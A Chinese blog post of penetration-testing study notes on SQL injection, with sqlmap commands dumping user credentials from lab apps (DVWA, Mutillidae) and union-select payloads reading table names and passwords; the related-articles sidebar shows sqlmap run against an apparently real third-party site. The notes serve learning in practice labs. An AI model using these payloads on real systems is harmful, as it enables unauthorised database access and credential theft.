kali渗透测试与教学笔记3:sql注入

最新推荐文章于 2024-03-27 17:19:51 发布
最新推荐文章于 2024-03-27 17:19:51 发布
阅读量488 收藏
点赞数
分类专栏: kali 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105627066
版权

web应用渗透测试技术:sql注入

以魔鬼训练营为例,书中用的是tamper data 插件,现在用burpsuite截获网页数据,注意要获取cookies数据

练习地址:

IBM的测试地址http://www.testfire.net/index.jsp

http://10.10.10.129/mutillidae/index.php?page=login.php

  • sqlmap:

查看到字段的语句如下

sqlmap -u 'http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit' --cookie='security=low; PHPSESSID=5bthna6rgifdi55n5c1sbl9pe7' --batch -D dvwa -T users -C user,passwd,user_id --dump


这里需要注意的是,DVWA网站,如果安全级别是“high”的情况,是扫不出来的。

  • XSS漏洞探测之扫描Mutillidae应用,地址:http://10.10.10.129/mutillidae/

利用w3af进行,设置如下

也可以使用acunetix、openvas、nessus

还可以用wXf这个软件。表示没有用过。

  • sql注入:

常用:

' or '1=1

’ or 1=1 --'   通过--,注释掉后面的验证,不同数据库注释语句不一样,要查查

可以结合sql语句其他方法进行注入:

原理:union 用于合并2个表,要求两个表有相同列数

用union列出字段探测:' union select 1 --',出错说明列数不相同,继续加列数' union select 1,2 --'直到探测出正确字段个数结果

利用这个方法查询一些有意义的数据库信息:

列出mysql系统中的所有数据表格名称

'union select 1,table_name from INFORMATION_SCHEMA.tables -- ' 注意最后要有空格

列出users数据表格字段

' union select 1,column_name from INFORMATION_SCHEMA.columns where table_name='users' -- '

列出users表中的password字段的值:

' union select NULL,password from users -- '

最后,用concat()把想要的信息合成一起,显示出来:

' union select 1,concat(first_name,' ',last_name,' ',password) from users -- '

基本理论到此结束。

实战一下,通过以上,似乎可以进行简单sql注入,但是心里没底。真正的实战来了:

盲注,字符的拆半拆解和基于服务器响应的时间拆解

拆半拆解:

 

 

 

花纵酒
关注
专栏目录
Kali SQL注入--基于SQLi-Labs
black101的博客
07-20 1926
Kali SQL注入--基于SQLi-LabsSQLi-LabsSQL注入SQL注入的基本原理SQL注入初步实验一个结束语 SQLi-Labs SQLi-Labs是一个练习和理解SQL注入的非常合适的靶站平台,总共有75关,这里我选择它做我的实验环境来对结果进行展示。 SQL注入 SQL注入的基本原理 首先,这不是一篇极为完整的SQL注入整理,这只是一篇对原理的简单复习和介绍。 SQL注入的基本原理 这是正常的SQL语句 select * from user where id = '$id' limit
使用kali完成sql注入
pray030的博客
12-09 9055
使用kali完成sql注入 本文仅用于学术参考分享,如有侵权,请联系作者删除,请勿随意对网站进行sql注入 前期准备 1.kali虚拟机(自带sql注入所需工具) 2.能够进行注入的网站 实验步骤 1.查看是否可以sql注入 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ GET 2.爆库 sqlmap -u ‘http://www.kfzhongzhou.com/cyjb_xx.asp?id=14’ --dbs 3.查看当前使用的是哪个
5_SQL注入简介.pptx
08-20
数据库相关概念,SQL注入相关概念,注入漏洞分类SQL,注入利用工具防御,SQL注入漏洞等相关攻防。
kalisql注入
03-19 705
ASP:1.网址后面加上一撇 ' 报错 and 1=1 正常显示,and1=2报错 网址:http://www.kfzhongzhou.com/cyjb_xx.asp?id=14 (get注入)2.kali Linux打开终端 输入命令 sqlmap -u 网址 --dbs --current-user (-u 输入目标网址 --dbs表示所有的数据库)3.结果显示出了服务器的...
Kali学习笔记39:SQL手工注入(1)
weixin_30670965的博客
02-11 197
终于到了SQL注入 最大的、最经典的、最常见的Web漏洞就是SQL注入漏洞 SQL注入的原理这里就不说了,百度 打开DVWA,SQL注入测试模块 测试单引号,发现出错,于是想到测试语句: 1' or '1'='1 成功: 测试是否存在漏洞: 1' and '1'='1 如果返回数据,但是1' and '1'='0 不返回数据,代表存在sql注入 或者...
Kali渗透测试之DVWA系列7——SQL Injection(SQL注入
浅浅的博客
06-13 3865
目录 一、SQL注入 1、SQL注入漏洞原理 2、SQL注入类型 3、SQL注入过程 二、实验环境 三、实验步骤 安全级别:LOW 安全等级:Medium 安全级别:High 安全级别:Impossible 一、SQL注入 1、SQL注入漏洞原理 把SQL命令插入到Web表单提交、或输入域名、或页面提交的查询字符串中,从而达到欺骗服务器执行恶意的SQL命令。 2、S...
渗透测试工具之sqlmap注入神器
qq_33441500的博客
10-17 712
渗透测试工具之sqlmap注入神器 一,sqlmap详解 sqlmap使用python编写的sql注入工具,暂仅支持pyth...
网络安全Kali Linux 进行SQL注入与XSS漏洞利用
最新发布
cronaldo91的博客
03-27 1999
(3) 查看Kali Linux (2022.4)系统IP地址。(2)查看Kali Linux (2022.4)系统版本。(5)Kali主机 ping Windows主机。(14)Windows主机弹出登录界面。(7)获取当前数据库指定的表的字段名。(4)Windows 查看IP地址。(6)获取当前数据库中所有表的名称。(8)获取指定库指定表指定字段的值。(1) LAMP(LNMP)平台。执行 (选择Execute)(15)beef获取账号及密码。(5)启动beef-xss。(9)beef获取目标主机。
"Kali下运维安全详细笔记:从sql注入漏洞到使用sqlmap获得数据库数据
其中,sqlmap是一款功能强大的自动化SQL注入和数据库渗透测试工具,可以帮助我们快速发现和利用SQL注入漏洞。 使用sqlmap进行SQL注入漏洞扫描非常简单。首先,我们需要提供目标URL或参数,并指定要使用的数据库类型...
Kali linux 学习笔记(四十九)Web渗透——sql注入 2020.3.26
闵行小鱼塘
03-26 843
学习sql注入
国外经典的SQL注入攻防教程中文版
11-13
最近看了不少老外写的东西,看时间相同的技术当铺比我们早了好长一段时间,比如ASP的SQL注射国外02年就出现了,PHP的也在04年出现,而我们一直到05年才接触到,看看比人家晚了多少时间呀! 为了尽快了解最新的技术动态,我坚持看E文资料,有的很长,有的很短,本人时间有限,不可能一一翻译过来,只能挑选自己认为比较适合大家看的东西翻译过来,希望你能从中学到东西。
w3af高级使用.pdf
03-02
w3af的高级用法,包括脚本扫描,登陆扫描等其他高级技巧。
渗透测试学习笔记
Tom197的博客
06-08 1488
2.子域名查询 3.NDS2IP 查询IP,可以通过ping域名方式获得。 站长之家也可以获得,得到IP更详细,通过不同服务器访问,得到大致位置。 nslookup 域名 dig 域名 dnsenum 域名 4.nmap测试 测试服务器所在局域网情况(服务器有哪些设备,开放了什么端口端口),防止一台服务器被攻陷,再延续到局域网其他服务器,nmap -sp 地址。 nmap -O 查询这一网络中每一台设备是什么系统 。AWVS ——new scan 输入网站地址,得到所有漏洞的信息,点击相应漏洞,右侧出
渗透测试笔记】十、SQL注入漏洞
【User Not Found】的博客
04-27 735
We are all in the gutter, but some of us are looking at the stars. 身在井隅,心向璀璨。 本文仅供学习交流,正确使用渗透测试,遵守相关法律法规,请勿用于非法用途。 目录实验环境SQL注入的危害漏洞挖掘SQL注入SQL盲注SQLMAP利用SQLMAP获取shell读写文件,获取shell过滤器绕过漏洞预防 实验环境 本实验基于以下...
【Linux_Kali网络渗透测试学习笔记总结(七)】提升权限
数据库爆破专家的博客
04-30 3008
网络渗透测试(六):提升权限 文章目录网络渗透测试(六):提升权限1.利用本地漏洞2.密码攻击2.1 离线攻击工具2.1.1 hash-dentifier2.1.2 Hashcat2.1.3 RainbowCrack2.1.4 samdump22.1.5 John2.1.6 Johnny2.1.7 Ophcrack2.1.8 Crunch2.2 在线破解工具2.2.1 CeWL2.2.2 Hydr...
视频教程-web渗透测试详细入门实践课程-kali/sql注入-渗透测试
weixin_28836857的博客
05-28 640
web渗透测试详细入门实践课程-kali/sql注入 2010年从事网络技术...
kali mysql注入_利用kali自带的sqlmap注入sqli-labs-master
weixin_42552261的博客
01-27 444
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。GET型的sqlmap爆破。1、检测目标的版本sqlmap -u http://localhost/sqli-labs-master/Less-2/?id=1效果图如下:2、检测目标的数据库sqlmap -u http://localhost/sqli-labs-master/Les...
Kali渗透测试(九)——DVWA SQL 注入
Bulldozer_GD的博客
07-16 630
Kali渗透测试(九)——DVWASQL注入 一. 低级别,没有对用户输入做任何限制,提及的数据直接拼接。 1. 查询所有数据库 2. 查询dvwa库中的表名 查询字段名 4. 查询用户名密码 5.也可以进行操作系统级别的命令执行 6.无权读取information_schema ,拒绝 union/order by 时: 猜列名:利用burpsuite Intruder 和字典文件 ' and column is null--猜表名 ' and table.user is n
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值